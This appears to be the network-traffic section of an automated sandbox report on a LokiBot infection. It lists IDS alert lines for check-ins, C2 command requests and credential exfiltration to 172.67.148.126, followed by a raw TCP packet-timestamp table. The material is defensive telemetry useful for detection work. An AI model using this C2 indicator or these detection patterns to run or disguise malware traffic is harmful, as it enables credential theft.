                                                04/06/24-09:29:51.920859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.6172.67.148.126
                                                04/06/24-09:30:41.966393TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.6172.67.148.126
                                                04/06/24-09:30:49.735329TCP2825766ETPRO TROJAN LokiBot Checkin M24983080192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.081982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.865138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.6172.67.148.126
                                                04/06/24-09:30:55.220105TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.865138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.920859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.891670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.891670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.6172.67.148.126
                                                04/06/24-09:31:08.547895TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.6172.67.148.126
                                                04/06/24-09:29:46.581121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.6172.67.148.126
                                                04/06/24-09:29:33.293191TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.6172.67.148.126
                                                04/06/24-09:30:35.733011TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.6172.67.148.126
                                                04/06/24-09:29:33.293191TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.6172.67.148.126
                                                04/06/24-09:30:44.269499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.6172.67.148.126
                                                04/06/24-09:29:29.470677TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.975531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.921065TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.6172.67.148.126
                                                04/06/24-09:31:08.547895TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.035047TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.079276TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.975531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.6172.67.148.126
                                                04/06/24-09:29:39.580792TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.6172.67.148.126
                                                04/06/24-09:31:03.891737TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.6172.67.148.126
                                                04/06/24-09:30:39.686953TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.194950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.6172.67.148.126
                                                04/06/24-09:30:30.339047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.194950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.6172.67.148.126
                                                04/06/24-09:30:13.652600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.6172.67.148.126
                                                04/06/24-09:29:25.556361TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.6172.67.148.126
                                                04/06/24-09:29:28.699735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.6172.67.148.126
                                                04/06/24-09:30:42.736556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.6172.67.148.126
                                                04/06/24-09:31:18.590588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.6172.67.148.126
                                                04/06/24-09:30:09.757970TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.972978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.204192TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.6172.67.148.126
                                                04/06/24-09:31:17.815577TCP2825766ETPRO TROJAN LokiBot Checkin M24986380192.168.2.6172.67.148.126
                                                04/06/24-09:30:15.972978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.6172.67.148.126
                                                04/06/24-09:30:42.736556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.6172.67.148.126
                                                04/06/24-09:30:53.641650TCP2825766ETPRO TROJAN LokiBot Checkin M24983580192.168.2.6172.67.148.126
                                                04/06/24-09:29:26.328739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.6172.67.148.126
                                                04/06/24-09:30:54.422589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.6172.67.148.126
                                                04/06/24-09:29:36.488685TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.042075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.814837TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.124910TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.042075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.862546TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.6172.67.148.126
                                                04/06/24-09:31:04.659572TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.6172.67.148.126
                                                04/06/24-09:30:41.966393TCP2825766ETPRO TROJAN LokiBot Checkin M24982080192.168.2.6172.67.148.126
                                                04/06/24-09:30:52.096160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.6172.67.148.126
                                                04/06/24-09:29:54.259588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.801533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.891260TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.112021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.136720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.6172.67.148.126
                                                04/06/24-09:30:32.673178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.897343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.839758TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971880192.168.2.6172.67.148.126
                                                04/06/24-09:31:06.999341TCP2825766ETPRO TROJAN LokiBot Checkin M24985080192.168.2.6172.67.148.126
                                                04/06/24-09:29:54.259588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.6172.67.148.126
                                                04/06/24-09:29:56.595283TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.6172.67.148.126
                                                04/06/24-09:29:35.705322TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.6172.67.148.126
                                                04/06/24-09:30:43.503603TCP2825766ETPRO TROJAN LokiBot Checkin M24982280192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.839758TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971880192.168.2.6172.67.148.126
                                                04/06/24-09:29:44.242163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.895022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.018070TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.6172.67.148.126
                                                04/06/24-09:30:51.314444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.6172.67.148.126
                                                04/06/24-09:29:44.242163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.6172.67.148.126
                                                04/06/24-09:30:13.652600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.860100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.6172.67.148.126
                                                04/06/24-09:30:14.423119TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.6172.67.148.126
                                                04/06/24-09:30:51.314444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.115114TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.895022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.6172.67.148.126
                                                04/06/24-09:31:14.663983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.6172.67.148.126
                                                04/06/24-09:30:23.301208TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.6172.67.148.126
                                                04/06/24-09:29:40.344957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.6172.67.148.126
                                                04/06/24-09:29:40.344957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.6172.67.148.126
                                                04/06/24-09:30:56.772335TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.6172.67.148.126
                                                04/06/24-09:31:01.546959TCP2825766ETPRO TROJAN LokiBot Checkin M24984380192.168.2.6172.67.148.126
                                                04/06/24-09:31:09.316933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.6172.67.148.126
                                                04/06/24-09:30:18.674487TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.6172.67.148.126
                                                04/06/24-09:31:07.768549TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.6172.67.148.126
                                                04/06/24-09:29:24.137227TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.6172.67.148.126
                                                04/06/24-09:30:26.424765TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.6172.67.148.126
                                                04/06/24-09:30:29.547586TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.6172.67.148.126
                                                04/06/24-09:30:45.801533TCP2825766ETPRO TROJAN LokiBot Checkin M24982580192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.128553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.961991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.6172.67.148.126
                                                04/06/24-09:30:10.531874TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.6172.67.148.126
                                                04/06/24-09:30:29.547586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.6172.67.148.126
                                                04/06/24-09:31:19.370644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.6172.67.148.126
                                                04/06/24-09:31:20.907030TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.117986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.6172.67.148.126
                                                04/06/24-09:30:08.980641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.861151TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.6172.67.148.126
                                                04/06/24-09:31:19.370644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.133120TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.6172.67.148.126
                                                04/06/24-09:30:08.980641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.128553TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.961991TCP2825766ETPRO TROJAN LokiBot Checkin M24987180192.168.2.6172.67.148.126
                                                04/06/24-09:31:09.316933TCP2825766ETPRO TROJAN LokiBot Checkin M24985380192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.206304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.862546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.6172.67.148.126
                                                04/06/24-09:31:13.117986TCP2825766ETPRO TROJAN LokiBot Checkin M24985980192.168.2.6172.67.148.126
                                                04/06/24-09:31:22.429106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.861151TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.096911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.6172.67.148.126
                                                04/06/24-09:30:12.096911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.6172.67.148.126
                                                04/06/24-09:30:37.305241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.206304TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.046578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.6172.67.148.126
                                                04/06/24-09:29:47.378472TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.046578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.6172.67.148.126
                                                04/06/24-09:30:49.735329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.799315TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.986411TCP2825766ETPRO TROJAN LokiBot Checkin M24980280192.168.2.6172.67.148.126
                                                04/06/24-09:30:59.991734TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.6172.67.148.126
                                                04/06/24-09:31:02.332845TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.799677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.6172.67.148.126
                                                04/06/24-09:29:48.178974TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.957388TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.6172.67.148.126
                                                04/06/24-09:29:51.123133TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.6172.67.148.126
                                                04/06/24-09:31:00.769505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.6172.67.148.126
                                                04/06/24-09:30:22.504191TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.079276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.6172.67.148.126
                                                04/06/24-09:30:47.361321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.6172.67.148.126
                                                04/06/24-09:31:22.429106TCP2825766ETPRO TROJAN LokiBot Checkin M24986980192.168.2.6172.67.148.126
                                                04/06/24-09:30:21.735500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.6172.67.148.126
                                                04/06/24-09:30:47.361321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.6172.67.148.126
                                                04/06/24-09:31:00.769505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.861510TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.6172.67.148.126
                                                04/06/24-09:29:48.178974TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.6172.67.148.126
                                                04/06/24-09:30:21.735500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.799677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.6172.67.148.126
                                                04/06/24-09:30:19.440133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.986411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.6172.67.148.126
                                                04/06/24-09:30:11.314149TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.6172.67.148.126
                                                04/06/24-09:29:31.298967TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.6172.67.148.126
                                                04/06/24-09:30:36.516498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.6172.67.148.126
                                                04/06/24-09:30:37.305241TCP2825766ETPRO TROJAN LokiBot Checkin M24981580192.168.2.6172.67.148.126
                                                04/06/24-09:29:30.251229TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.080334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.6172.67.148.126
                                                04/06/24-09:31:11.610579TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.6172.67.148.126
                                                04/06/24-09:31:01.546959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.6172.67.148.126
                                                04/06/24-09:29:59.690030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.846749TCP2825766ETPRO TROJAN LokiBot Checkin M24985680192.168.2.6172.67.148.126
                                                04/06/24-09:30:22.504191TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.6172.67.148.126
                                                04/06/24-09:30:36.516498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.088060TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.6172.67.148.126
                                                04/06/24-09:30:00.493399TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.6172.67.148.126
                                                04/06/24-09:29:59.690030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.6172.67.148.126
                                                04/06/24-09:30:01.279270TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.6172.67.148.126
                                                04/06/24-09:31:10.080334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.6172.67.148.126
                                                04/06/24-09:29:30.251229TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.6172.67.148.126
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 6, 2024 09:29:24.010575056 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.134854078 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.134974957 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.137227058 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.261346102 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.261514902 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.385816097 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.653399944 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.653533936 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.654429913 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.654491901 CEST4971780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.713296890 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.779493093 CEST8049717172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.837235928 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.837327957 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.839757919 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:24.963665009 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:24.963792086 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.087979078 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.361860991 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.362015009 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.362027884 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.362072945 CEST4971880192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.429287910 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.486277103 CEST8049718172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.554042101 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.554176092 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.556360960 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.685225010 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:25.685328007 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:25.811079025 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.063576937 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.063747883 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.063848972 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.063898087 CEST4971980192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.188164949 CEST8049719172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.202606916 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.326373100 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.326536894 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.328738928 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.452440977 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.452619076 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.576917887 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.844019890 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.844155073 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.844314098 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.844363928 CEST4972080192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:26.968004942 CEST8049720172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:26.983146906 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.107435942 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.107558966 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.109786987 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.233928919 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.234020948 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.358174086 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.639862061 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.639986992 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.640588045 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.640651941 CEST4972180192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.764014959 CEST8049721172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.779928923 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.903629065 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:27.903841972 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:27.906070948 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.029750109 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.029813051 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.153486967 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.413724899 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.413861990 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.414184093 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.414242983 CEST4972280192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.537666082 CEST8049722172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.573250055 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.697454929 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.697601080 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.699734926 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.823865891 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:28.823987007 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:28.948112011 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.197910070 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.198033094 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.198896885 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.198945045 CEST4972380192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.322170019 CEST8049723172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.344439030 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.468365908 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.468483925 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.470676899 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.594594002 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.594660997 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.718596935 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.977092981 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.977197886 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:29.977204084 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:29.977243900 CEST4972480192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.100966930 CEST8049724172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.124515057 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.249034882 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.249166012 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.251229048 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.375611067 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.375672102 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.499991894 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.771745920 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.771934032 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.772193909 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:30.772242069 CEST4972580192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:30.896317959 CEST8049725172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:31.172570944 CEST4972780192.168.2.6172.67.148.126
                                                Apr 6, 2024 09:29:31.296713114 CEST8049727172.67.148.126192.168.2.6
                                                Apr 6, 2024 09:29:31.296808004 CEST4972780192.168.2.6172.67.148.126
